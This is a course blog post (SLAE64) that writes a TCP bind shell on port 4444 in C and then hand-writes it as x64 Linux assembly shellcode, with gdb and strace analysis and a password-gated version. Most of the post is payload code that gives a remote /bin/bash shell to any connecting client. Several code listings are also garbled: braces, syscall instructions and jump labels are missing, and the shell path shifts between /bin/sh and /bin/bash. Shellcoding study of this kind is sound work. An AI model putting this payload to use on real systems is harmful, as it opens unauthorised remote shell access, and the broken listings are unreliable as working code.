SLAE64 Assignment 1 - TCP Bind-Shell Shellcode

23 minute read

Bindshell Analysis

To better understand x64 shellcode, I first created a working bindshell in C.


#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <stdlib.h>
int main(void)
  int ipv4Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
  struct sockaddr_in ipSocketAddr = { 
    .sin_family = AF_INET, 
    .sin_port = htons(4444), 
    .sin_addr.s_addr = htonl(INADDR_ANY) 
  bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr));
  listen(ipv4Socket, 0);
  int clientSocket = accept(ipv4Socket, NULL, NULL);
  dup2(clientSocket, 0);
  dup2(clientSocket, 1);
  dup2(clientSocket, 2);
  execve("/bin/bash", NULL, NULL);

Compile Shellcode

root# uname -orm
5.3.0-amd64 x86_64 GNU/Linux
root# gcc bindshell.c -o bindshell

Test Shellcode

Terminal 1

root# ./bindshell

Terminal 2

root# nc 4444

Function Analysis

1. Create a new Socket.

socket(int domain, int type, int protocol); 
socket parameters
int domain = AF_INET
  • IPv4 Internet protocols.
int type = SOCK_STREAM
  • Provides sequenced, reliable, two-way, connection-based byte streams (TCP).
int protocol = IPPROTO_IP
  • The protocol to be used with the socket.
  • With only one protocol option in the address family, the value 0x0 is used.

2. Create an IP Socket Address structure.

struct sockaddr_in {
  sa_family_t    sin_family; /* address family: AF_INET */
  in_port_t      sin_port;   /* port in network byte order */
  struct in_addr sin_addr;   /* internet address */
struct in_addr {
  uint32_t       s_addr;     /* address in network byte order */
struct sockaddr_in ipSocketAddr = { 
  .sin_family = AF_INET, 
  .sin_port = htons(4444), 
  .sin_addr.s_addr = htonl(INADDR_ANY) 
  • An IP socket address is defined as a combination of an IP interface address and a 16-bit port number.
struct sockaddr parameters
sa_family_t sin_family  = AF_INET
  • From Socket, we know that we will need to use the Address Family AF_INET
in_port_t sin_port      = htons(4444)
  • TCP Port 4444
  • The htons() function converts our decimal integer to 16-byte little-endian hex (aka “network byte order”)
  • TCP ports are 16 bits (2 bytes).
struct in_addr sin_addr = htonl(INADDR_ANY)
  • All interfaces.
  • The htonl() function converts our decimal integer to 32-byte little-endian hex.
  • IPv4 addresses are 32 bits (4 bytes).

3. Bind the IP Socket Address to Socket.

int bind(int sockfd, const struct sockaddr \*addr, socklen\_t addrlen);`

bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr));
  • For complete details see: man bind
bind parameters
sockfd = ipv4Socket
  • The socket file descriptor returned from socket() and saved as the variable ipv4Socket.
const struct sockaddr *addr = &ipSocketAddr
  • A pointer to the IP Socket Address structure ipSocketAddr.
socklen_t addrlen = sizeof(ipSocketAddr)
  • The byte length of our ipSocketAddr structure.
  • sizeof() returns the length in bytes of the variable.

4. Listen for connections to the TCP Socket at the IP Socket Address.

int listen(int sockfd, int backlog);

listen(ipv4Socket, 0);
  • For complete details see: man listen
listen Parameters
int sockfd  = ipv4Socket
int backlog = 0
  • This is for handling multiple connections.
  • We only need to handle one connection at a time, therefor we will set this value to 0.

5. Accept connections to the TCP-IP Socket and create a Client Socket.

int accept4(int sockfd, struct sockaddr *addr, socklen_t *addrlen, int flags);

int clientSocket = accept(ipv4Socket, NULL, NULL);
  • For complete details see: man accept
accept parameters
int sockfd = ipv4Socket
struct sockaddr *addr = NULL
  • This structure is filled in with the address of the peer socket.
socklen_t *addrlen = NULL
  • When addr is NULL, nothing is filled in; in this case, addrlen is not used, and should also be NULL.
int flags  = NULL
  • The function will return the new Socket File-Descriptor. Save as clientSocket

6. Transfer Standard-Input, Standard-Output, and Standard-Error to the client socket.

int dup2(int oldfd, int newfd);
dup2(clientSocket, 0); // STDIN
dup2(clientSocket, 1); // STDOUT
dup2(clientSocket, 2); // STDERR
  • For complete details see: man dup2
  • We will need to call this function 3 times to transfer Standard Input, Standard Output and Standard Error

7. Spawn a /bin/sh shell for the client, in the connected session.

int execve(const char *pathname, char *const argv[], char *const envp[]);
execve("/bin/sh", NULL, NULL);
  • For complete details see: man execve
execve() parameters
const char *pathname = "/bin/sh"
char *const argv[] = NULL
char *const envp[] = NULL

Trace System-Calls

Use strace to see system calls as the shellcode executes.

  • strace will show us all of the system calls that occur within the program.
  • I removed all of the system-calls that were irrelevant from the system trace output.
root# strace ./bindshell
  • The returned Socket File-Descriptor for our new socket is ‘3’.
bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("")}, 16) = 0
listen(3, 0)                            = 0
accept(3, NULL, NULL
  • We can see our program hangs at accept(.
  • To satisfy the accept function, we connect with nc 4444.
accept(3, NULL, NULL)                   = 4
dup2(4, 0)                              = 0
dup2(4, 1)                              = 1
dup2(4, 2)                              = 2
execve("/bin/bash", NULL, NULL)         = 0
  • The accept function takes in the socket handle returned from socket(), and returns a new socket handle 4 that will be used for the client connection.
  • We take the client socket handle 4 and use it as an arugment for our dup2() functions.
  • The 0,1, and 2 are the handles for input, output and error.

Trace Library Calls

Use ltrace to see library calls as the program executes.

  • I removed all of the library calls that were irrelevant from the library trace output.
socket(2, 1, 0)                                      = 3
htons(4444, 1, 0, 0x7f05dfff78d7)                    = 0x5c11
htonl(0, 1, 0, 0x7f05dfff78d7)                       = 0
bind(3, 0x7ffe5256d920, 16, 0x7ffe5256d920)          = 0
listen(3, 0, 16, 0x7f05dfff72a7)                     = 0
accept(3, 0, 0, 0x7f05dfff7407)                      = 4
dup2(4, 0)                                           = 0
dup2(4, 1)                                           = 1
dup2(4, 2)                                           = 2
execve(0x5597bd4ce004, 0, 0, 0x7f05dffe8027 <no return ...>

GDB Analysis

Calling Order for System Calls

  1. RAX = System Call Number
  2. RDI = 1st Argument
  3. RSI = 2nd Argument
  4. RDX = 3rd Argument


root# gdb ./bindshell
GNU gdb (Debian 8.3.1-1) 8.3.1
gdb-peda$ info functions
0x0000000000001030  htons@plt
0x0000000000001040  dup2@plt
0x0000000000001050  htonl@plt
0x0000000000001060  execve@plt
0x0000000000001070  listen@plt
0x0000000000001080  bind@plt
0x0000000000001090  accept@plt
0x00000000000010a0  socket@plt
gdb-peda$ break bind@plt
Breakpoint 1 at 0x1080
gdb-peda$ run
RAX = 0x31 - bind syscall
=> 0x7ffff7edf2a0 <bind>:       mov    eax,0x31
RDI = 0x3 - int sockfd
  • returned from socket()
RDI: 0x3
RSI = const struct sockaddr *addr
RSI: 0x7fffffffe130 --> 0x5c110002
gdb-peda$ hexdump 0x7fffffffe130 16
0x00007fffffffe130 : 02 00 11 5c 00 00 00 00 00 00 00 00 00 00 00 00
RDX = socklen_t addrlen
RDX: 0x10
  • 0x10 is 16 bytes
    struct sockaddr_in ipSocketAddr = {
        .sin_family = AF_INET,
        .sin_port = htons(4444),
        .sin_addr.s_addr = inet_addr("")
  • Mod bindshell.c

  • Compile & investigate changes:

root# gcc bindshell.c -o bshell2
root# gdb ./bshell2
gdb-peda$ b bind@plt
gdb-peda$ r
### STACK ###
0008| 0x7fffffffe130 --> 0xc18080405c110002
0016| 0x7fffffffe138 --> 0x0
gdb-peda$ x/16b 0x00007fffffffe130
0x7fffffffe130: 0x02    0x00    0x11    0x5c    0x40    0x80    0x80    0xc1
0x7fffffffe138: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
gdb-peda$ hexdump 0x00007fffffffe130 16
0x00007fffffffe130 : 02 00 11 5c 40 80 80 c1 00 00 00 00 00 00 00 00
  • we can see that changing the sin_addr.s_addr parameter changes the 4 bytes from 5 to 8
gdb-peda$ hexdump 0x00007fffffffe134 4
0x00007fffffffe134 : 40 80 80 c1
# The 16 byte struct for the sockaddr_in
         02 00 11 5c 40 80 80 c1 00 00 00 00 00 00 00 00
Address-Family| PORT| IP Address| 8 bytes of unused space in IPv4?
  • man bind shows that the sockaddr stuct is 16 bytes which is what we see from inspecting the assembly.
struct sockaddr {
  sa_family_t sa_family;
  char        sa_data[14];

Bindshell Assembly

  • We will state what the assembly parameters will be at time of SYSCALL


  • RAX = 0x29
    • socket syscall
gdb-peda$ b socket@plt
Breakpoint 1 at 0x10a0
gdb-peda$ r
=> 0x7ffff7edf8d0 <socket>:     mov    eax,0x29
   0x7ffff7edf8d5 <socket+5>:   syscall
  • RDI = 0x2
    • AF_INET
  • RSI = 0x1
  • RDX = 0x0

Socket Assembly

; int ipv4Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
; rax = 0x29
; rdi = 0x2  = AF_INET
; rsi = 0x1  = SOCK_STREAM
; rdx = 0x0  = IPPROTO_IP
xor rsi, rsi   ; clear rsi
mul rsi        ; clear rax, rdx ; rdx = 0x0 = IPPROTO_IP
inc rsi        ; rsi = 0x1 = SOCK_STREAM
push rsi
pop rdi        ; rdi = 0x1
inc rdi        ; rdi = 0x2 = AF_INET
syscall        ; socket syscall ; RAX returns socket File-Descriptor
push rax       ; [RSP] = sockfd


  • RAX = 0x31
    • bind syscall
  • RDI = 0x3
    • int sockfd
  • RSI = Pointer to 16 bytes on the stack
    • const struct sockaddr *addr
# stuct sockaddr breakdown
         02 00 11 5c 00 00 00 00 00 00 00 00 00 00 00 00 
Address-Family| PORT| IP Address| 8 bytes of zeros
  • Address-Family = 02 00
  • PORT = 11 5c
    • TCP Port 4444
  • IP Address = 00 00 00 00
  • RDX = 0x10 (16 bytes / the size of the struct)
    • socklen_t addrlen

Bind Assembly

; bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr));
; rax = 0x31
; rdi = 0x3  =  ipv4Socket
; rsi = &ipSocketAddr
;          02 00 11 5c 00 00 00 00 00 00 00 00 00 00 00 00
; Address-Family| PORT| IP Address| 8 bytes of zeros
; rdx = 0x10 
xchg rdi, rax    ; RDI = sockfd / ipv4Socket
xor rax, rax
add al, 0x31     ; rax = 0x31 = socket syscall
push rdx         ; 8 bytes of zeros for second half of struct
push dx         ; 4 bytes of zeros for IPADDR_ANY
push dx         ; 4 bytes of zeros for IPADDR_ANY
push word 0x5c11 ; push 2 bytes for TCP Port 4444
inc rdx
inc rdx          ; rdx = 0x2 ; dx = 0x0002
push dx          ; 0x2 = AF_INET
add dl, 0xe      ; rdi = 0x10 = sizeof(ipSocketAddr)
mov rsi, rsp     ; rsi = &ipSocketAddr


root# nasm -f elf64 bindshell.asm -o bindshell.o
root# ld bindshell.o -o bindshell
root# gdb ./bindshell
   0x401025 <_start+37>:        inc    rdx
   0x401028 <_start+40>:        push   dx
   0x40102a <_start+42>:        mov    rsi,rsp
=> 0x40102d <_start+45>:        syscall
gdb-peda$ x/16x $rsp
0x7fffffffe1f0: 0x02    0x00    0x11    0x5c    0x00    0x00    0x00    0x00
0x7fffffffe1f8: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
gdb-peda$ hexdump $rsp 16
0x00007fffffffe1f0 : 02 00 11 5c 00 00 00 00 00 00 00 00 00 00 00 00   ...\............


  • RAX = 0x32
    • listen system call
=> 0x7ffff7edf400 <listen>:     mov    eax,0x32
   0x7ffff7edf405 <listen+5>:   syscall
  • RDI = 0x3
    • sockfd / socket file-descriptor returned from socket()
  • RSI = 0x0
    • backlog

Listen Assembly

; int listen(int sockfd, int backlog);
; rax = 0x32    = listen syscall
; rdi = sockfd  = 0x3 = ipv4Socket
; rsi = backlog = 0
xor rax, rax
add al, 0x32
xor rdi, rdi


  • RAX = 0x2b
    • accept syscall
0x7ffff7edf20d <__libc_accept+13>:   mov    eax,0x2b
0x7ffff7edf212 <__libc_accept+18>:   syscall
  • RDI = 0x3
    • sockfd / socket file-descriptor returned from socket()
  • RSI = NULL / 0x0
    • sock addr *addr
  • RDX = NULL / 0x0
    • socklen_t *addrlen
Accept Assembly
; rax = 0x2b
; rdi = sockfd  = 0x3 = ipv4Socket
; rsi = 0x0
; rdx = 0x0
xor rax, rax
push rax
push rax
pop rdx
pop rsi
add al, 0x2b
syscall       ; accept returns client socket file-descriptor in RAX


  • we need to call this 3 times

  • RAX = 0x21

=> 0x7ffff7ed0020 <dup2>:       mov    eax,0x21
   0x7ffff7ed0025 <dup2+5>:     syscall
  • RDI = 0x4
    • int oldfd
    • This is the socket file descriptor returned from the accept() function
    • This will change and need to be referenced dynamically

Loop through dup2() 3 times

First dup2 call
  • RSI = 0x0
    • int newfd
    • Standard Input file descriptor
Second dup2 call
  • RSI = 0x1
    • int newfd
    • Standard Output file descriptor
Third dup2 call
  • RSI = 0x2
    • int newfd
    • Standard Error file descriptor
dup2 Assembly
; dup2
xchg rdi, rax    ; RDI = sockfd / ClientSocketFD
xor rsi, rsi
add dl, 0x3      ; Loop Counter
xor rax, rax
add al, 0x21     ; RAX = 0x21 = dup2 systemcall
syscall          ; call dup2 x3 to redirect STDIN STDOUT STDERR
inc rsi
cmp rsi, rdx     ; if 2-STDERR, end loop
jne dup2Loop


  • RAX = 0x3b
=> 0x7ffff7eabe80 <execve>:     mov    eax,0x3b
   0x7ffff7eabe85 <execve+5>:   syscall
  • RDI = Pointer to “/bin/bash”
    • const char *pathname = "/bin/bash"
    • Must be null terminated (end the string with a 0x00)
RDI: 0x555555556004 ("/bin/bash")
gdb-peda$ x/10b 0x555555556004
0x555555556004: 0x2f    0x62    0x69    0x6e    0x2f    0x62    0x61    0x73
0x55555555600c: 0x68    0x00
gdb-peda$ x/s 0x555555556004
0x555555556004: "/bin/bash"
  • RSI = 0x0 char *const argv[]

  • RDX = 0x0 char *const envp[]

Execve Assembly

; rax = 0x3b
; rdi = Pointer -> "/bin/bash"0x00
;root# python "/bin/bash"
;String length : 9
;h : 68
;sab/nib/ : 7361622f6e69622f
; rsi = 0x0
; rdx = 0x0
xor rsi, rsi
mul rsi          ; rdx&rax= 0x0
xor rdi, rdi
push rdi
add rdx, 0x68
push rdx
mov rdx, 0x7361622f6e69622f ; "/bin/bas"
push rdx
xor rdx, rdx
mov rdi, rsp
mov al, 0x3b
syscall  ; call execve("/bin/bash", NULL, NULL)

Bindshell Assembly with Password

global _start
section .text
; int ipv4Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
; rax = 0x29
; rdi = 0x2  = AF_INET
; rsi = 0x1  = SOCK_STREAM
; rdx = 0x0  = IPPROTO_IP
xor rsi, rsi   ; clear rsi
mul rsi        ; clear rax, rdx ; rdx = 0x0 = IPPROTO_IP
add al, 0x29   ; rax = 0x29 = socket syscall
inc rsi        ; rsi = 0x1 = SOCK_STREAM
push rsi
pop rdi        ; rdi = 0x1
inc rdi        ; rdi = 0x2 = AF_INET
syscall        ; socket syscall ; RAX returns socket File-Descriptor
; bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr));
; rax = 0x31
; rdi = 0x3  =  ipv4Socket
; rsi = &ipSocketAddr
;          02 00 11 5c 00 00 00 00 00 00 00 00 00 00 00 00
; Address-Family| PORT| IP Address| 8 bytes of zeros
; rdi = 0x10
xchg rdi, rax    ; RDI = sockfd / ipv4Socket
xor rax, rax
add al, 0x31     ; rax = 0x31 = socket syscall
push rdx         ; 8 bytes of zeros for second half of struct
push dx         ; 4 bytes of zeros for IPADDR_ANY
push dx         ; 4 bytes of zeros for IPADDR_ANY
push word 0x5c11 ; push 2 bytes for TCP Port 4444
inc rdx
inc rdx          ; rdx = 0x2 ; dx = 0x0002
push dx          ; 0x2 = AF_INET
add dl, 0xe      ; rdi = 0x10 = sizeof(ipSocketAddr)
mov rsi, rsp     ; rsi = &ipSocketAddr
; int listen(int sockfd, int backlog);
; rax = 0x32    = listen syscall
; rdi = sockfd  = 0x3 = ipv4Socket
; rsi = backlog = 0
xor rax, rax
add al, 0x32
xor rsi, rsi
; rax = 0x2b
; rdi = sockfd  = 0x3 = ipv4Socket
; rsi = 0x0
; rdx = 0x0
xor rax, rax
push rax
push rax
pop rdx
pop rsi
add al, 0x2b
syscall       ; accept returns client socket file-descriptor in RAX
; dup2
xchg rdi, rax    ; RDI = sockfd / ClientSocketFD
xor rsi, rsi
add dl, 0x3      ; Loop Counter
xor rax, rax
add al, 0x21     ; RAX = 0x21 = dup2 systemcall
syscall          ; call dup2 x3 to redirect STDIN STDOUT STDERR
inc rsi
cmp rsi, rdx     ; if 2-STDERR, end loop
jne dup2Loop
jmp short password
; write
; rax = 0x1
; rdi = fd = 0x1 STDOUT
; rsi = &String
; rdx = sizeof(String)
;root# python "REALLY?!"
;String length : 8
;!?YLLAER : 213f594c4c414552
xor rdi, rdi
mul rdi
push rdi
pop rsi
push rsi
mov rsi, 0x213f594c4c414552
push rsi
mov rsi, rsp    ; rsi = &String
inc rax         ; rax = 0x1 = write system call
mov rdi, rax
add rdx, 16     ; 16 bytes / size of string
; write
; rax = 0x1
; rdi = fd = 0x1 STDOUT
; rsi = &String
; rdx = sizeof(String)
;root# python "M@G1C WOrDz IZ??"
;String length : 16
;??ZI zDr : 3f3f5a49207a4472
;OW C1G@M : 4f5720433147404d
xor rdi, rdi
mul rdi
push rdi
pop rsi
push rsi
mov rsi, 0x3f3f5a49207a4472
push rsi
mov rsi, 0x4f5720433147404d
push rsi
mov rsi, rsp    ; rsi = &String
inc rax         ; rax = 0x1 = write system call
mov rdi, rax
add rdx, 16     ; 16 bytes / size of string
; read
; rax = 0x0 = read systemcall
; rdi = fd = 0x0 STDIN
; rsi = Write to &String
; rdx = 0x12 = sizeof(String)
xor rdi, rdi
push rdi
mul rdi         ; rdx =0x0 ; rax = 0x0 = write system call
mov rsi, rsp    ; rsi = [RSP] = &String
add rdx, 12     ; 12 bytes / size of password
; String = P3WP3Wl4ZerZ
;   String length : 12
;     ZreZ : 5a72655a
;     4lW3PW3P : 346c573350573350
mov rdi, rsp
xor rsi, rsi
add rsi, 0x5a72655a
push rsi
mov rsi, 0x346c573350573350
push rsi
mov rsi, rsp    ; rsi = &String
xor rcx, rcx
add rcx, 0xB
repe cmpsb
jnz failer
; rax = 0x3b
; rdi = Pointer -> "/bin/bash"0x00
;root# python "/bin/bash"
;String length : 9
;h : 68
;sab/nib/ : 7361622f6e69622f
; rsi = 0x0
; rdx = 0x0
xor rsi, rsi
mul rsi          ; rdx&rax= 0x0
xor rdi, rdi
push rdi
add rdx, 0x68
push rdx
mov rdx, 0x7361622f6e69622f ; "/bin/bas"
push rdx
xor rdx, rdx
mov rdi, rsp
mov al, 0x3b
syscall  ; call execve("/bin/bash", NULL, NULL)

SLAE64 Blog Proof

This blog post has been created for completing the requirements of the x86_64 Assembly Language and Shellcoding on Linux (SLAE64):
SLAE/Student ID: PA-10913
